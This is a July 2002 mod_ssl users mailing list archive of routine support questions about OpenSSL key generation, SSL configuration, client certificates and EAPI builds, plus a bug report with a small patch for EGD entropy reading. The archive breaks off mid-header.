Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul  3 12:51:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA28948; Wed, 3 Jul 2002 12:50:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA28837; Wed, 3 Jul 2002 12:49:22 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 639214CE69A; Wed,  3 Jul 2002 12:49:17 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id F1F212884F; Wed,  3 Jul 2002 12:47:55 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id LAA18060; Wed, 3 Jul 2002 11:08:05 +0200 (MET DST)
Date: Wed, 3 Jul 2002 11:08:05 +0200 (MET DST)
Message-Id: <200207030908.LAA18060@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] error when i create private key (PR#728)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: saher
Version: 
OS: 
Submission from: (NULL) (195.226.230.37)


Hi

The problem i have it , 
when i wont create a new RSA Private Key for our Apache server 
using this  command 

$ openssl genrsa -des3 -out ca.key 1024 

OR

$ openssl genrsa -des3  1024 > ca.key

this error coming for me 

worning , not  mutch extra random data , consider using the -rand option
generating RSA private key . 1024 bit long moduls.

16863 : error : 24064064 random number generator :SSLEAY_RAND_BYTES :PRNG not
seeded : md__rand .c :538

16863 : error : 04069003 :rsa routines : RSA_GENERATOR_KEY :BN lib : rsa_gen .c
:182
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul  3 12:51:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA28957; Wed, 3 Jul 2002 12:50:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA28838; Wed, 3 Jul 2002 12:49:23 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 719F14CE6E2; Wed,  3 Jul 2002 12:49:17 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id D337228738; Wed,  3 Jul 2002 12:48:02 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from dns.gulfins.com.kw id LAA21381; Wed, 3 Jul 2002 11:37:12 +0200 (MET DST)
Received: by dns.172.17.1.12 with Internet Mail Service (5.5.2653.19)
	id <3FY9HPAV>; Wed, 3 Jul 2002 12:38:53 +0300
Message-ID: 
From: Saher 
To: "'modssl-users@modssl.org'" 
Subject: problem when i create private key
Date: Wed, 3 Jul 2002 12:38:53 +0300 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="windows-1256"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Saher 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi

The problem i have it , 
when i wont create a new RSA Private Key for our Apache server 
using this  command 

$  openssl genrsa -des3 -out ca.key 1024 

OR

 $ openssl genrsa -des3  1024 > ca.key

this error coming for me 

worning , not  mutch extra random data , consider using the -rand option
generating RSA private key . 1024 bit long moduls.

16863 : error : 24064064 random number generator :SSLEAY_RAND_BYTES :PRNG
not seeded : md__rand .c :538

16863 : error : 04069003 :rsa routines : RSA_GENERATOR_KEY :BN lib : rsa_gen
.c :182

if you have the selution please send it in this email

saherfathy@hotmail.com

thanks
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul  3 13:05:52 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA01188; Wed, 3 Jul 2002 13:05:01 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id NAA01057; Wed, 3 Jul 2002 13:03:49 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g63B35r23298;
	Wed, 3 Jul 2002 12:03:10 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Wed, 3 Jul 2002 12:04:28 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F020672BD@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Cc: saher@gulfins.com.kw
Subject: RE: problem when i create private key
Date: Wed, 3 Jul 2002 12:03:01 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="windows-1256"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Try this instead

openssl genrsa -des3 -rand file1:file2:file3:file4:file5 -out ca.key 1024

Where file1 to file5 are reasonably random files. Log files are handy for
this.

- 
John Airey
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Is the statement 'There is no such thing as truth'  true?


> -----Original Message-----
> From: Saher [mailto:saher@gulfins.com.kw]
> Sent: 03 July 2002 10:39
> To: 'modssl-users@modssl.org'
> Subject: problem when i create private key
> 
> 
> 
> Hi
> 
> The problem i have it , 
> when i wont create a new RSA Private Key for our Apache server 
> using this  command 
> 
> $  openssl genrsa -des3 -out ca.key 1024 
> 
> OR
> 
>  $ openssl genrsa -des3  1024 > ca.key
> 
> this error coming for me 
> 
> worning , not  mutch extra random data , consider using the 
> -rand option
> generating RSA private key . 1024 bit long moduls.
> 
> 16863 : error : 24064064 random number generator 
> :SSLEAY_RAND_BYTES :PRNG
> not seeded : md__rand .c :538
> 
> 16863 : error : 04069003 :rsa routines : RSA_GENERATOR_KEY 
> :BN lib : rsa_gen
> .c :182
> 
> if you have the selution please send it in this email
> 
> saherfathy@hotmail.com
> 
> thanks
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul  3 14:31:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA11491; Wed, 3 Jul 2002 14:30:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cs.bu.edu id OAA11347; Wed, 3 Jul 2002 14:29:26 +0200 (MET DST)
Received: from csa.bu.edu (savarese@csa [128.197.12.3])
	by cs.bu.edu (8.12.2/8.12.2) with ESMTP id g63CTNPq002856
	for ; Wed, 3 Jul 2002 08:29:23 -0400 (EDT)
Received: from localhost (savarese@localhost)
	by csa.bu.edu (8.10.1/8.10.1) with ESMTP id g63CTLf05922
	for ; Wed, 3 Jul 2002 08:29:21 -0400 (EDT)
X-Authentication-Warning: csa.bu.edu: savarese owned process doing -bs
Date: Wed, 3 Jul 2002 08:29:21 -0400 (EDT)
From: Scott Savarese 
To: modssl-users@modssl.org
Subject: question on configuring modssl.
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Scott Savarese 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I've been trying for a few days to configure modssl up on my apache
server. I have it installed and loading without a problem, but for some
reason I get errors when trying to view an ssl page. I think the error is
related to my certificated.

I have apache version 2.0.39 on Linux 2.4.17, with the openssl-0.9.6c. I
get alot of errors in my logs and I want to try configuring ssl from
scratch. Can somebody explain how to configure ssl for a host that has
multiple virtualhosts some of which will be using ssl and some
without. How do a create keys and certificates to self sign?

Thanks,
Scott

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul  3 15:32:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA18598; Wed, 3 Jul 2002 15:31:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA18505; Wed, 3 Jul 2002 15:30:25 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 098694CE697; Wed,  3 Jul 2002 15:30:24 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 50D902874A; Wed,  3 Jul 2002 15:29:37 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mx-1.kerntec.com.br id OAA12684; Wed, 3 Jul 2002 14:39:04 +0200 (MET DST)
From: guslist@kerntec.net
Received: from gustavo (mq-141.kerntec.com.br [200.184.159.141])
	by mx-1.kerntec.com.br (8.12.1/8.12.1) with SMTP id g63Ck4IG019782
	for ; Wed, 3 Jul 2002 09:46:11 -0300
Message-ID: <007701c2228d$4db90760$8d9fb8c8@kerntec>
To: 
Subject: Client Certificates
Date: Wed, 3 Jul 2002 09:29:40 -0300
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: guslist@kerntec.net
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello All,

Apologies if this has been asked before, I'm new to this list.

I´m trying to create a Client Certificate to a MSExplorer Browser. I want to
generate certificates to a couple of clients and only this clients will be
allowed to access a specific URL from my site.
I´ve tryed to generate a cert to the client and sign on the Server using
OpenSSL but I think that I have the wrong steps for this.

Can any one point me a URL,doc anything on how I can do this ?

Ps. As this message wasn´t delivered I´m sending it again.

Thank´s in advance,
Gus

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul  4 00:39:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA14662; Thu, 4 Jul 2002 00:38:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sage-one.net id AAA14587; Thu, 4 Jul 2002 00:37:31 +0200 (MET DST)
Received: from sagea (sagea [192.168.0.3])
	by sage-one.net (8.11.6/8.11.6) with SMTP id g63MbS556037
	for ; Wed, 3 Jul 2002 17:37:29 -0500 (CDT)
	(envelope-from jacks@sage-american.com)
Message-Id: <3.0.5.32.20020703173727.00e19068@sage-american.com>
X-Sender: jacks@sage-american.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Wed, 03 Jul 2002 17:37:27 -0500
To: modssl-users@modssl.org
From: "Jack L. Stone" 
Subject: apache+mod_ssl-1.3.26+2.8.9 to 2.8.10
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jack L. Stone" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello! Am running FBSD 4.5 with apache+mod_ssl-1.3.26+2.8.9
Just updated Apache1.3.26 (for patch) to above with mod_ssl-2.8.9 and now I
see that mod_ssl has a bug fix and now has version 2.8.10 out. I'm having
one of those days and cannot see anything about the bug fix for version
"10" and is it anything I need to rush and recompile to Apache +
"mod_ssl-2.8.10"....???

Appreciate info.... thanks!

Best regards,
Jack L. Stone,
Administrator

Sage American
http://www.sage-american.com
jacks@sage-american.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul  4 10:33:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA21015; Thu, 4 Jul 2002 10:32:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from PROXYWACME id KAA20893; Thu, 4 Jul 2002 10:31:20 +0200 (MET DST)
Received: FROM glauco.it BY PROXYWACME ; Thu Jul 04 10:25:16 2002 +0200
Message-ID: <3D241602.E9303552@glauco.it>
Date: Thu, 04 Jul 2002 10:31:46 +0100
From: Daniela Prestipino 
X-Mailer: Mozilla 4.77 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: SSL only Authentication Cient
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniela Prestipino 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,
Is it possible to config SSL protocol with only client authentication,
without encrypting the transmitted data, using Apache 1.3.19 with
mod_ssl 2.8.1 and openssl 0.9.5a?
Thanks
Daniela

--
    Daniela Prestipino
    d.prestipino@glauco.it

    I.D.S.,
    Informatica Distribuita e Software srl
    Via Consolare Pompea 19
    98168 Messina ITALIA
    Tel.: +39 90 353638
    Fax : +39 90 3500063


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul  4 14:30:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA14779; Thu, 4 Jul 2002 14:29:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id OAA14701; Thu, 4 Jul 2002 14:28:32 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 820344CE69A; Thu,  4 Jul 2002 14:28:31 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 491FB286E3; Thu,  4 Jul 2002 14:27:56 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id MAA01520; Thu, 4 Jul 2002 12:08:13 +0200 (MET DST)
Date: Thu, 4 Jul 2002 12:08:13 +0200 (MET DST)
Message-Id: <200207041008.MAA01520@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] SSLRandomSeed: Number of bytes to read from EGD is ignored (PR#729)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Philipp Hullmann
Version: 2.8.10
OS: AIX 4.3.3
Submission from: (NULL) (130.75.48.131)


When using EGD to seed the random number generator, mod_ssl always 
reads 255 bytes of entropy instead of the number given in the 
configuration file.

Patch (the SSL_LIBRARY_VERSION parameter should probably be checked - 
I am using OpenSSL 0.9.6c, and RAND_egd_bytes is said to be 
available since version 0.9.6, but I haven't actually tested this with
earlier incarnations of OpenSSL):

diff -c mod_ssl-2.8.10-1.3.26/pkg.sslmod/ssl_engine_rand.c
mod_ssl-patched/pkg.sslmod
/ssl_engine_rand.c
*** mod_ssl-2.8.10-1.3.26/pkg.sslmod/ssl_engine_rand.c  Sun Jun 23 11:51:02
2002
--- mod_ssl-patched/pkg.sslmod/ssl_engine_rand.c        Thu Jul  4 11:34:51
2002
***************
*** 126,132 ****
--- 126,138 ----
                   * seed in contents provided by the external
                   * Entropy Gathering Daemon (EGD)
                   */
+ #if SSL_LIBRARY_VERSION >= 0x00906000
+                 if ((n = RAND_egd_bytes(pRandSeed->cpPath,
+                                       pRandSeed->nBytes))
+                   == -1)
+ #else
                  if ((n = RAND_egd(pRandSeed->cpPath)) == -1)
+ #endif
                      continue;
                  nDone += n;
              }
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul  5 18:22:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA27936; Fri, 5 Jul 2002 18:21:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from owl4.owl.co.uk id SAA27894; Fri, 5 Jul 2002 18:20:48 +0200 (MET DST)
Received: from ferret.owl.co.uk (ferret.owl.co.uk [192.168.150.61]) by owl4.owl.co.uk
 (Rockliffe SMTPRA 4.5.6) with ESMTP id  for ;
 Fri, 5 Jul 2002 17:20:40 +0100
Message-Id: <5.1.0.14.0.20020705171116.0230bc58@pophost.owl.co.uk>
X-Sender: colmm@pophost.owl.co.uk
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Fri, 05 Jul 2002 17:20:22 +0100
To: modssl-users@modssl.org
From: Colm McCartan 
Subject: [Slightly OT] Building EAPI apache
In-Reply-To: <3D241602.E9303552@glauco.it>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Colm McCartan 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello all,

I know this isn't purely a mod_ssl issue but its pretty closely involved 
and since I imagine many people are doing the same thing just now 
(upgrading apache)...

I have been trying to upgrade to 1.3.26 in the light of the 
chunked-encoding bug but have been unable to build it with the EAPI option. 
AFAICT this is not mentioned anywhere in the install docs or configuration. 
Without it, the most recent version of modssl won't compile complaining 
"Installed Apache doesn't contain Extended API (EAPI)"

If I understand correctly, in earlier versions there was an apache 
configuration rule but with 1.3.26

--enable-rule=EAPI

fails..

Am I missing something glaringly obvious?

Many thanks for any lights,
colm

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul  5 19:18:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA03158; Fri, 5 Jul 2002 19:17:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA03104; Fri, 5 Jul 2002 19:16:44 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 78C134CE5F1; Fri,  5 Jul 2002 19:16:43 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id BBEA028680; Fri,  5 Jul 2002 19:15:08 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from torcorp01.infinetcomm.com id SAA00610; Fri, 5 Jul 2002 18:52:54 +0200 (MET DST)
Received: by mail.infinetcomm.com with Internet Mail Service (5.5.2653.19)
	id <32TJN6DL>; Fri, 5 Jul 2002 12:52:47 -0400
Message-ID: <4F9F40E78BDED311890C00D0B73E9CBB019FB1FC@mail.infinetcomm.com>
From: Shawn Syms 
To: "'modssl-users@modssl.org'" 
Cc: "'colmm@owl.co.uk'" 
Subject: RE: [Slightly OT] Building EAPI apache
Date: Fri, 5 Jul 2002 12:52:46 -0400 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Shawn Syms 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Set this environment variable:
CFLAGS=-DEAPI

S.

Shawn Syms | Systems Administrator
Infinet Communications | ssyms@infinetcomm.com

-----Original Message-----
From: Colm McCartan [mailto:colmm@owl.co.uk]
Sent: Friday, July 05, 2002 12:20 PM
To: modssl-users@modssl.org
Subject: [Slightly OT] Building EAPI apache


Hello all,

I know this isn't purely a mod_ssl issue but its pretty closely involved 
and since I imagine many people are doing the same thing just now 
(upgrading apache)...

I have been trying to upgrade to 1.3.26 in the light of the 
chunked-encoding bug but have been unable to build it with the EAPI option. 
AFAICT this is not mentioned anywhere in the install docs or configuration. 
Without it, the most recent version of modssl won't compile complaining 
"Installed Apache doesn't contain Extended API (EAPI)"

If I understand correctly, in earlier versions there was an apache 
configuration rule but with 1.3.26

--enable-rule=EAPI

fails..

Am I missing something glaringly obvious?

Many thanks for any lights,
colm

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul  5 23:50:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA28640; Fri, 5 Jul 2002 23:49:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from inet.codep.cz id XAA28560; Fri, 5 Jul 2002 23:48:31 +0200 (MET DST)
Received: from jesip (ppp632.ul.worldonline.cz [212.90.234.254])
	(authenticated (0 bits))
	by inet.codep.cz (8.11.6/8.11.6) with ESMTP id g65KmUx29249
	for ; Fri, 5 Jul 2002 22:48:30 +0200
From: =?iso-8859-2?Q?Jan_=A9kola?= 
To: 
Subject: Apache 2.0.39 Win32 SSL partial content
Date: Fri, 5 Jul 2002 23:48:24 +0200
Message-ID: <000c01c2246d$b3cc2190$0100000a@jesip>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-2?Q?Jan_=A9kola?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I'm running Apache 2.0.39 on WinXP over SSL, but I have problem with
long static or PHP generated pages. Then Apache returns only partial
content and then closes connection. On non-SSL connection is everythoing
OK. The problem is best seen in phpinfo(); page, the content and point
is in every reply in other place. Some (approx. 10%) queries are
returned OK, but others not. It is not problem of browser, I tried IE6
and Mozilla with same results. Previous try was with Apache 1.3.26 with
mod_ssl 2.8.9 with same result. I've already tried to recompile OpenSSL,
same result. Do you have any idea?

Thank you very much
	Jan Skola 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul  6 13:23:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA28047; Sat, 6 Jul 2002 13:22:06 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA28019; Sat, 6 Jul 2002 13:21:36 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id B64004CE696; Sat,  6 Jul 2002 12:59:05 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 392A3286BA; Sat,  6 Jul 2002 12:50:04 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.evergo.net id GAA22335; Sat, 6 Jul 2002 06:59:26 +0200 (MET DST)
Received: (qmail 10659 invoked from network); 6 Jul 2002 00:59:23 -0000
Received: from dsl.216.223.21.172.evergo.net (HELO evergo.net) (216.223.21.172)
  by mail.evergo.net with SMTP; 6 Jul 2002 00:59:23 -0000
Message-ID: <3D2640D6.579612E1@evergo.net>
Date: Fri, 05 Jul 2002 17:59:02 -0700
From: Arlen Duncan II 
X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Buffer overflow vulnerability in apache2.0.30 mod_ssl
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Arlen Duncan II 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

the mod_ssl included in the apache2.0.39 is reporting as version 2.8.7
which is vulnerable to buffer overflow. CVE: CAN-2002-0082

Is the mod_ssl with 2.0.39 vulnerable as reported? or is this a false
positive? If it is vulnerable, how do
I update the mod_ssl as distributed with apache2.0.39 to the june-24th
release of 2.8.10 for apache1.3.26?

Thanks,

Arlen Duncan II
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul  7 09:40:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA21987; Sun, 7 Jul 2002 09:39:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA21960; Sun, 7 Jul 2002 09:38:54 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C5D214CE5F1; Sun,  7 Jul 2002 09:38:53 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 9401A286C5; Sun,  7 Jul 2002 09:23:21 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mavrick.outland id XAA19493; Sat, 6 Jul 2002 23:48:00 +0200 (MET DST)
Received: from localhost ([192.168.100.6] RDNS failed) by mavrick.outland with Microsoft SMTPSVC(5.0.2195.4453);
	 Sat, 6 Jul 2002 13:58:42 -0800
Date: Sat, 6 Jul 2002 13:47:56 -0800
Mime-Version: 1.0 (Apple Message framework v482)
Content-Type: text/plain; charset=US-ASCII; format=flowed
Subject: startssl means nothing.
From: Mark-Nathaniel Weisman 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
Message-Id: <08496641-912A-11D6-BE87-00306548FDCC@infinitevisions.ws>
X-Mailer: Apple Mail (2.482)
X-OriginalArrivalTime: 06 Jul 2002 21:58:42.0703 (UTC) FILETIME=[4B0859F0:01C22538]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mark-Nathaniel Weisman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello List:
   I'm kinda stuck here so I figured I'd try the list to see if I can get 
any movement. I've got my local server certificate created, I've even 
created a ca.key so that I can sign my own certs. I've installed the 
following on my redhat 6.2 webserver:
	apache-1.3.22-5.6
	apache-devel-1.3.23-15
	openssl-0.9.5a-7.6
	mod_ssl-2.8.7-6
   I've used only rpm files with this install. I've installed all three 
packages with their dependancies, the openssl and mod_ssl were compiled 
from source. However, two things did not happen,
  1. There were no changes made to my httpd.conf file?
  2. My httpd script does not recognize startssl as an option.
  3. Port 443 is not open on the box even if I set a VirtualHost 
directive.

Any ideas?

His Faithful Servant,
Mark
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul  7 15:47:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA21679; Sun, 7 Jul 2002 15:46:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id PAA21596; Sun, 7 Jul 2002 15:45:19 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
